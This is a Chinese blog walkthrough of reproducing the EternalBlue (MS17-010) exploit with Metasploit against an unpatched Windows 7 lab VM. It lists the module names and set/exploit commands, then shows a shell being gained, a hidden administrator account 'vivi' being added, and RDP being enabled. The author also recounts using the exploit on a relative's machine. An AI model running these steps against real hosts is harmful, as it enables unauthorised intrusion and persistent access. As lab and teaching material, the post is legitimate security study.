夜樱

永恒之蓝漏洞简单利用—(ms17-010)
永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,该工具利用445/TCP端口的文件分享协议的...
扫描右侧二维码阅读全文
27
2019/07

永恒之蓝漏洞简单利用—(ms17-010)

永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,该工具利用445/TCP端口的文件分享协议的漏洞进行散播,当时的勒索病毒也是利用445端口进行传播造成严重的影响。

头图:星空列车-CZY

为什么要写出来?也是今天亲戚过来帮忙看看为什么电脑上会自动多出奇怪的软件啊文件啊,其实内心是拒绝的,总感觉是上网习惯不规范导致下载到了毒文件吧。然而最后还是接过来看看,端口一扫有点懵逼,嗯?135,139.445端口全开。。。 445这不是永恒之蓝可以利用的嘛,win10试试利用下吧虽然不太可能,结果还真就提到权了。。看傻

445端口介绍: 445端口是一个用于共享文件夹或共享打印机的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机

最后就帮忙告知后关了这些端口让他自己多注意没用的端口养成良好的上网习惯也就结束了,因为真的病毒嵌入了我也不会啊qwq。

这里的话我用虚拟机来搭一个简单的又理想的环境做一次实例吧。

永恒之蓝复现

实验环境(虚拟机环境):

  • window7(未打补丁切开放445端口)
  • kali Linux

使用Kali主机对目标主机进行端口扫描确认端口是否开放

445端口扫描.jpg

显示出了445端口以及window操作系统信息后,确认完毕后使用metasploit Framework工具进行利用

在终端输入msfconsole启用工具

msfconsole.jpg

寻找永恒之蓝利用的脚本模块:search ms17-010

search ms17-010.jpg

其中我们找到需要exp

不需要smb用户和密码:exploit/windows/smb/ms17_010_eternalblue

需要(也可无需)smb用户和密码:exploit/windows/smb/ms17_010_psexec

我们就先用最传统的payload的exploit/windows/smb/ms17_010_eternalblue模块进行利用

选择需要使用的模块:use exploit/windows/smb/ms17_010_eternalblue
设置好目标主机:set rhost <ip>后进行exploit即可进行渗透攻击

永恒之蓝利用.jpg

这里信息显示我们的攻击包成功发到了对方主机并成功有了回应,然后创建出一个会话窗口,这时候我们就成功获得到了对方主机,用whoami指令来看看

getshell.jpg

已成功获得windows管理员权限

于是乎开始使用net命令添加账户到目标主机上玩玩

添加用户.jpg

我们创建了新用户vivi并设置密码为233并将其划分进本地的管理组这样vivi用户就有了管理员权限

这样受害主机上就会多出我们创建的用户

受害主机.jpg

后面在通过命令开启3389端口等等我们就可以远程连接到受害主机的桌面进行操控,或者在命令行里做些动作。

到此一次简单的永恒之蓝复现就结束了,主要目标为win7主机用户并且为打补丁或者补丁不完全,win10上大部分已经堵上了,当然也存在少部分可以利用

也可以使用exploit/windows/smb/ms17_010_psexec这个模块进行操作可以针对win10但是上面那个模块只能针对win7以及部分winserver,use选择后可以用info来查看具体模块信息。
若是知道主机账户和密码可以设置smbuser和smbpass进行

set smbuser xxxxxx
set smbpass xxxxxx

再设置目标主机 set rhost <ip>
之后exploit即可

最后在用不到的端口一定要在防火墙里阻塞掉哦并且养成良好的上网习惯,说不定就直接被搞了呢uwu

Last modification:July 27th, 2019 at 11:19 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment